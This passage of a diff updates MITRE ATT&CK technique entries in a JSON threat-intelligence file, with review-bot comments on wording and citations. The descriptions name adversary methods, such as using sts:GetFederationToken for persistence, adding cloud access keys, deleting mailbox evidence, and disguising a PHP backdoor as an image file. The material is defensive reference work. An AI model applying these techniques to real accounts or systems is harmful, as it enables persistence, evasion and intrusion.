request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image)\n\nAn adversary may take advantage of that build
API to build a custom image on the host that includes malware downloaded from their C2 server, and then they then may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua Security Cloud Native Threat Report June 2021) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment. ",
+ "description": "Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote build
request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image)\n\nAn adversary may take advantage of that build
API to build a custom image on the host that includes malware downloaded from their C2 server, and then they may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua Security Cloud Native Threat Report June 2021) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment. ",
"meta": {
"external_id": "T1612",
"kill_chain": [
@@ -7068,10 +7102,6 @@
"refs": [
"https://arstechnica.com/information-technology/2015/03/massive-denial-of-service-attack-on-github-tied-to-chinese-government/",
"https://attack.mitre.org/techniques/T1499",
- "https://capec.mitre.org/data/definitions/125.html",
- "https://capec.mitre.org/data/definitions/130.html",
- "https://capec.mitre.org/data/definitions/131.html",
- "https://capec.mitre.org/data/definitions/227.html",
"https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf",
"https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html",
"https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf",
@@ -7333,7 +7363,7 @@
"value": "Dynamic-link Library Injection - T1055.001"
},
{
- "description": "Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other applications with Internet accessible open sockets, such as web servers and related services.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). \n\nIf an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.\n\nFor websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)",
+ "description": "Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.\n\nExploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). \n\nIf an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.\n\nAdversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)\n\nFor websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)",
"meta": {
"external_id": "T1190",
"kill_chain": [
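Review bot: the rewritten opening drops 'design vulnerability' from the kinds of weakness and substitutes 'a temporary glitch', which is both vaguer and narrower: logic flaws and insecure defaults in Internet-facing applications are exactly what the OWASP Top 10 / CWE Top 25 sentence kept at the end of the string refers to. Suggest 'a software bug, a design flaw, or a misconfiguration'. The two new citation keys (Mandiant Fortinet Zero Day, Wired Russia Cyberwar) line up with the two URLs added in the following refs hunk.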
@@ -7359,7 +7389,9 @@
"https://nvd.nist.gov/vuln/detail/CVE-2016-6662",
"https://us-cert.cisa.gov/ncas/alerts/TA18-106A",
"https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-microsoft-windows-smb-server-could-allow-for-remote-code-execution/",
- "https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project"
+ "https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem",
+ "https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project",
+ "https://www.wired.com/story/russia-ukraine-cyberattacks-mandiant/"
]
},
"uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
@@ -7380,7 +7412,7 @@
"value": "Untargeted client-side exploitation - T1370"
},
{
- "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).\n\nICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.(Citation: Microsoft ICMP) However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.",
+ "description": "Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).\n\nICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.(Citation: Microsoft ICMP) However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.",
"meta": {
"external_id": "T1095",
"kill_chain": [
@@ -7409,7 +7441,7 @@
"value": "Non-Application Layer Protocol - T1095"
},
{
- "description": "Adversaries may target multi-factor authentication (MFA) mechanisms, (I.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, services, and network resources. Use of MFA is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. \n\nIf a smart card is used for multi-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011)\n\nAdversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011)\n\nOther methods of MFA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Although primarily focused on by cyber criminals, these authentication mechanisms have been targeted by advanced actors. (Citation: Operation Emmental)",
+ "description": "Adversaries may target multi-factor authentication (MFA) mechanisms, (i.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, services, and network resources. Use of MFA is recommended and provides a higher level of security than usernames and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. \n\nIf a smart card is used for multi-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011)\n\nAdversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011)\n\nOther methods of MFA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Service providers can also be targeted: for example, an adversary may compromise an SMS messaging service in order to steal MFA codes sent to users’ phones.(Citation: Okta Scatter Swine 2022)",
"meta": {
"external_id": "T1111",
"kill_chain": [
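Review bot: 'mechanisms, (i.e., smart cards, token generators, etc.) to gain' keeps the stray comma before the parenthesis from the old text; drop it since the line is being rewritten. The removal of the Operation Emmental sentence and its citation is matched by the removed Trend Micro URL in the next hunk, and the new '(Citation: Okta Scatter Swine 2022)' is matched by the added sec.okta.com ref, so the refs stay consistent with the text.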
@@ -7426,10 +7458,10 @@
"macOS"
],
"refs": [
- "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf",
"https://attack.mitre.org/techniques/T1111",
"https://dl.mandiant.com/EE/assets/PDF_MTrends_2011.pdf",
- "https://gcn.com/cybersecurity/2011/06/rsa-confirms-its-tokens-used-in-lockheed-hack/282818/"
+ "https://gcn.com/cybersecurity/2011/06/rsa-confirms-its-tokens-used-in-lockheed-hack/282818/",
+ "https://sec.okta.com/scatterswine"
]
},
"uuid": "dd43c543-bb85-4a6f-aa6e-160d90d06a49",
@@ -7581,7 +7613,6 @@
"refs": [
"http://support.microsoft.com/kb/314984",
"https://attack.mitre.org/techniques/T1021/002",
- "https://capec.mitre.org/data/definitions/561.html",
"https://docs.microsoft.com/en-us/archive/blogs/jepayne/monitoring-what-matters-windows-event-forwarding-for-everyone-even-if-you-already-have-a-siem",
"https://docs.microsoft.com/en-us/archive/blogs/jepayne/tracking-lateral-movement-part-one-special-groups-and-specific-service-accounts",
"https://en.wikipedia.org/wiki/Server_Message_Block",
@@ -7777,13 +7808,14 @@
"value": "Clear Command History - T1070.003"
},
{
- "description": "Adversaries may modify mail application data to remove evidence of their activity. Email applications allow users and other programs to export and delete mailbox data via command line tools or use of APIs. Mail application data can be emails or logs generated by the application or operating system, such as export requests. \n\nAdversaries may manipulate email mailbox data to remove logs and artifacts, such as evidence of [Phishing](https://attack.mitre.org/techniques/T1566)/[Internal Spearphishing](https://attack.mitre.org/techniques/T1534), [Email Collection](https://attack.mitre.org/techniques/T1114), [Mail Protocols](https://attack.mitre.org/techniques/T1071/003) for command and control, or email-based exfiltration such as [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). For example, to remove evidence on Exchange servers adversaries have used the ExchangePowerShell
[PowerShell](https://attack.mitre.org/techniques/T1059/001) module, including Remove-MailboxExportRequest
to remove evidence of mailbox exports.(Citation: Volexity SolarWinds)(Citation: ExchangePowerShell Module) On Linux and macOS, adversaries may also delete emails through a command line utility called mail
or use [AppleScript](https://attack.mitre.org/techniques/T1059/002) to interact with APIs on macOS.(Citation: Cybereason Cobalt Kitty 2017)(Citation: mailx man page)",
+ "description": "Adversaries may modify mail and mail application data to remove evidence of their activity. Email applications allow users and other programs to export and delete mailbox data via command line tools or use of APIs. Mail application data can be emails, email metadata, or logs generated by the application or operating system, such as export requests. \n\nAdversaries may manipulate emails and mailbox data to remove logs, artifacts, and metadata, such as evidence of [Phishing](https://attack.mitre.org/techniques/T1566)/[Internal Spearphishing](https://attack.mitre.org/techniques/T1534), [Email Collection](https://attack.mitre.org/techniques/T1114), [Mail Protocols](https://attack.mitre.org/techniques/T1071/003) for command and control, or email-based exfiltration such as [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). For example, to remove evidence on Exchange servers adversaries have used the ExchangePowerShell
[PowerShell](https://attack.mitre.org/techniques/T1059/001) module, including Remove-MailboxExportRequest
to remove evidence of mailbox exports.(Citation: Volexity SolarWinds)(Citation: ExchangePowerShell Module) On Linux and macOS, adversaries may also delete emails through a command line utility called mail
or use [AppleScript](https://attack.mitre.org/techniques/T1059/002) to interact with APIs on macOS.(Citation: Cybereason Cobalt Kitty 2017)(Citation: mailx man page)\n\nAdversaries may also remove emails and metadata/headers indicative of spam or suspicious activity (for example, through the use of organization-wide transport rules) to reduce the likelihood of malicious emails being detected by security products.(Citation: Microsoft OAuth Spam 2022)",
"meta": {
"external_id": "T1070.008",
"kill_chain": [
"mitre-attack:defense-evasion"
],
"mitre_data_sources": [
+ "Application Log: Application Log Content",
"Command: Command Execution",
"File: File Deletion",
"File: File Modification",
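Review bot: the added data source "Application Log: Application Log Content" is the right home for the new transport-rule paragraph at the end of the description, since organization-wide rule changes surface in the mail platform's own audit log and not in the Command/File sources already listed; however, that paragraph's citation key (Citation: Microsoft OAuth Spam 2022) is only resolvable through the microsoft.com URL added in the next hunk, so the two hunks must ship together. Separately, the identifiers in this description (ExchangePowerShell, Remove-MailboxExportRequest, mail) appear as bare words, while text added in later hunks of this same diff uses backtick code spans (`sts:GetFederationToken`, `ip ssh pubkey-chain`); worth checking whether the generator strips one markup form but passes the other through, because the rendered galaxy would then show mixed formatting inside a single field.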
@@ -7801,6 +7833,7 @@
"https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
"https://docs.microsoft.com/en-us/powershell/module/exchange/?view=exchange-ps#mailboxes",
"https://man7.org/linux/man-pages/man1/mailx.1p.html",
+ "https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/",
"https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/"
]
},
@@ -7894,7 +7927,6 @@
"refs": [
"http://blog.crowdstrike.com/adversary-tricks-crowdstrike-treats/",
"https://attack.mitre.org/techniques/T1021/001",
- "https://capec.mitre.org/data/definitions/555.html",
"https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx"
]
},
@@ -8176,7 +8208,7 @@
"value": "Local Data Staging - T1074.001"
},
{
- "description": "Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials.\n\nApplication access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) \n\nIn AWS and GCP environments, adversaries can trigger a request for a short-lived access token with the privileges of another user account.(Citation: Google Cloud Service Account Credentials)(Citation: AWS Temporary Security Credentials) The adversary can then use this token to request data or perform actions the original account could not. If permissions for this feature are misconfigured – for example, by allowing all users to request a token for a particular account - an adversary may be able to gain initial access to a Cloud Account or escalate their privileges.(Citation: Rhino Security Labs Enumerating AWS Roles)\n\nOAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. 
Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta)\n\nFor example, with a cloud-based email service once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a \"refresh\" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017)\n\nCompromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.",
+ "description": "Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials.\n\nApplication access tokens are used to make authorized API requests on behalf of a user or service and are commonly used to access resources in cloud, container-based applications, and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) \n\nOAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta)\n\nFor example, with a cloud-based email service, once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a \"refresh\" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017)\n\nCompromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. 
In AWS and GCP environments, adversaries can trigger a request for a short-lived access token with the privileges of another user account.(Citation: Google Cloud Service Account Credentials)(Citation: AWS Temporary Security Credentials) The adversary can then use this token to request data or perform actions the original account could not. If permissions for this feature are misconfigured – for example, by allowing all users to request a token for a particular account - an adversary may be able to gain initial access to a Cloud Account or escalate their privileges.(Citation: Rhino Security Labs Enumerating AWS Roles)\n\nDirect API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. For example, in AWS environments, an adversary who compromises a user’s AWS API credentials may be able to use the `sts:GetFederationToken` API call to create a federated user session, which will have the same permissions as the original user but may persist even if the original user credentials are deactivated.(Citation: Crowdstrike AWS User Federation Persistence) Additionally, access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.",
"meta": {
"external_id": "T1550.001",
"kill_chain": [
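Review bot: the reordering moves the AWS/GCP short-lived-token paragraph below the OAuth discussion and attaches the new sts:GetFederationToken example to the "negates the effectiveness of a second authentication factor" sentence, which reads well; but the same GetFederationToken claim is added almost verbatim to T1098.001 in a later hunk of this diff with the same Crowdstrike citation. Both placements are defensible (use of the token here, persistence there), but nothing in this hunk touches mitre_data_sources, so a reviewer cannot tell from the diff whether federated sessions created this way are covered by the sources listed for T1550.001; please confirm against the upstream object.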
@@ -8197,7 +8229,6 @@
"refs": [
"https://attack.mitre.org/techniques/T1550/001",
"https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/",
- "https://capec.mitre.org/data/definitions/593.html",
"https://cloud.google.com/iam/docs/creating-short-lived-service-account-credentials",
"https://cloud.google.com/iam/docs/service-account-monitoring",
"https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen",
@@ -8205,7 +8236,8 @@
"https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_request.html",
"https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens",
"https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration",
- "https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/"
+ "https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/",
+ "https://www.crowdstrike.com/blog/how-adversaries-persist-with-aws-user-federation/"
]
},
"related": [
@@ -8250,7 +8282,7 @@
"value": "SQL Stored Procedures - T1505.001"
},
{
- "description": "Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport.\n\nAdversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as tar
on Linux and macOS or zip
on Windows systems. On Windows, diantz
or makecab
may be used to package collected files into a cabinet (.cab) file. diantz
may also be used to download and compress files from remote locations (i.e. [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)).(Citation: diantz.exe_lolbas) Additionally, xcopy
on Windows can copy files and directories with a variety of options.\n\nAdversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.(Citation: 7zip Homepage)(Citation: WinRAR Homepage)(Citation: WinZip Homepage)",
+ "description": "Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport.\n\nAdversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as tar
on Linux and macOS or zip
on Windows systems. \n\nOn Windows, diantz
or makecab
may be used to package collected files into a cabinet (.cab) file. diantz
may also be used to download and compress files from remote locations (i.e. [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)).(Citation: diantz.exe_lolbas) xcopy
on Windows can copy files and directories with a variety of options. Additionally, adversaries may use [certutil](https://attack.mitre.org/software/S0160) to Base64 encode collected data before exfiltration. \n\nAdversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.(Citation: 7zip Homepage)(Citation: WinRAR Homepage)(Citation: WinZip Homepage)",
"meta": {
"external_id": "T1560.001",
"kill_chain": [
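Review bot: the new sentence "adversaries may use [certutil](https://attack.mitre.org/software/S0160) to Base64 encode collected data before exfiltration" is the only claim in this description without a citation, and no ref is added for it anywhere in this diff; it also stretches the "compress and/or encrypt" framing of the technique, since Base64 is an encoding and neither compresses nor protects data. The wording is upstream, so the fix belongs in mitre/cti, but the missing ref is worth flagging there. The new paragraph break after "on Windows systems. \n\n" is fine.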
@@ -8285,14 +8317,13 @@
"value": "Archive via Utility - T1560.001"
},
{
- "description": "Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.\n\nFor example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair
or ImportKeyPair
API in AWS or the gcloud compute os-login ssh-keys add
command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)\n\nAdversaries may also use the CreateAccessKey
API in AWS or the gcloud iam service-accounts keys create
command in GCP to add access keys to an account. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation)",
+ "description": "Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.\n\nFor example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair
or ImportKeyPair
API in AWS or the gcloud compute os-login ssh-keys add
command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)\n\nAdversaries may also use the CreateAccessKey
API in AWS or the gcloud iam service-accounts keys create
command in GCP to add access keys to an account. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation)\n\nIn AWS environments, adversaries with the appropriate permissions may also use the `sts:GetFederationToken` API call to create a temporary set of credentials tied to the permissions of the original user account. These credentials may remain valid for the duration of their lifetime even if the original account’s API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation Persistence)",
"meta": {
"external_id": "T1098.001",
"kill_chain": [
"mitre-attack:persistence"
],
"mitre_data_sources": [
- "Active Directory: Active Directory Object Modification",
"User Account: User Account Modification"
],
"mitre_platforms": [
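Review bot: two points. First, removing "Active Directory: Active Directory Object Modification" from mitre_data_sources leaves only "User Account: User Account Modification", even though the description still opens with adding x509 keys and passwords to Azure AD service principals and applications; confirm the upstream object dropped that source deliberately, because it is the one a detection engineer would map Azure AD audit events to. Second, the new GetFederationToken paragraph puts its citation after a literal "\n" ("...deactivated.\n(Citation: Crowdstrike AWS User Federation Persistence)"), unlike every other citation in the field, which follows its sentence directly; harmless as JSON, but it may render as a dangling line in the galaxy HTML.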
@@ -8309,6 +8340,7 @@
"https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/",
"https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/",
"https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1",
+ "https://www.crowdstrike.com/blog/how-adversaries-persist-with-aws-user-federation/",
"https://www.youtube.com/watch?v=wQ1CuAPnrLM&feature=youtu.be&t=2815"
]
},
@@ -8465,7 +8497,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1550/002",
- "https://capec.mitre.org/data/definitions/644.html",
"https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/"
]
},
@@ -8532,7 +8563,6 @@
"refs": [
"https://attack.mitre.org/techniques/T1056/002",
"https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html",
- "https://capec.mitre.org/data/definitions/659.html",
"https://embracethered.com/blog/posts/2021/spoofing-credential-dialogs/",
"https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/",
"https://logrhythm.com/blog/do-you-trust-your-computer/",
@@ -8698,7 +8728,6 @@
"http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf",
"https://adsecurity.org/?p=556",
"https://attack.mitre.org/techniques/T1550/003",
- "https://capec.mitre.org/data/definitions/645.html",
"https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf",
"https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/"
]
@@ -8730,7 +8759,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1056/003",
- "https://capec.mitre.org/data/definitions/569.html",
"https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/"
]
},
@@ -8844,8 +8872,7 @@
],
"refs": [
"https://arstechnica.com/security/2016/07/after-hiatus-in-the-wild-mac-backdoors-are-suddenly-back/",
- "https://attack.mitre.org/techniques/T1036/006",
- "https://capec.mitre.org/data/definitions/649.html"
+ "https://attack.mitre.org/techniques/T1036/006"
]
},
"related": [
@@ -8915,6 +8942,36 @@
"uuid": "c071d8c1-3b3a-4f22-9407-ca4e96921069",
"value": "Install Digital Certificate - T1608.003"
},
+ {
+ "description": "Adversaries may masquerade malicious payloads as legitimate files through changes to the payload's formatting, including the file’s signature, extension, and contents. Various file types have a typical standard format, including how they are encoded and organized. For example, a file’s signature (also known as header or magic bytes) is the beginning bytes of a file and is often used to identify the file’s type. For example, the header of a JPEG file, is 0xFF 0xD8
and the file extension is either `.JPE`, `.JPEG` or `.JPG`. \n\nAdversaries may edit the header’s hex code and/or the file extension of a malicious payload in order to bypass file validation checks and/or input sanitization. This behavior is commonly used when payload files are transferred (e.g., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) and stored (e.g., [Upload Malware](https://attack.mitre.org/techniques/T1608/001)) so that adversaries may move their malware without triggering detections. \n\nCommon non-executable file types and extensions, such as text files (`.txt`) and image files (`.jpg`, `.gif`, etc.) may be typically treated as benign. Based on this, adversaries may use a file extension to disguise malware, such as naming a PHP backdoor code with a file name of test.gif
. A user may not know that a file is malicious due to the benign appearance and file extension.\n\nPolygot files, which are files that have multiple different file types and that function differently based on the application that will execute them, may also be used to disguise malicious malware and capabilities.(Citation: polygot_icedID)",
+ "meta": {
+ "external_id": "T1036.008",
+ "kill_chain": [
+ "mitre-attack:defense-evasion"
+ ],
+ "mitre_data_sources": [
+ "Command: Command Execution",
+ "File: File Modification"
+ ],
+ "mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/techniques/T1036/008",
+ "https://unit42.paloaltonetworks.com/polyglot-file-icedid-payload"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
+ "type": "subtechnique-of"
+ }
+ ],
+ "uuid": "208884f1-7b83-4473-ac22-4e1cf6c41471",
+ "value": "Masquerade File Type - T1036.008"
+ },
{
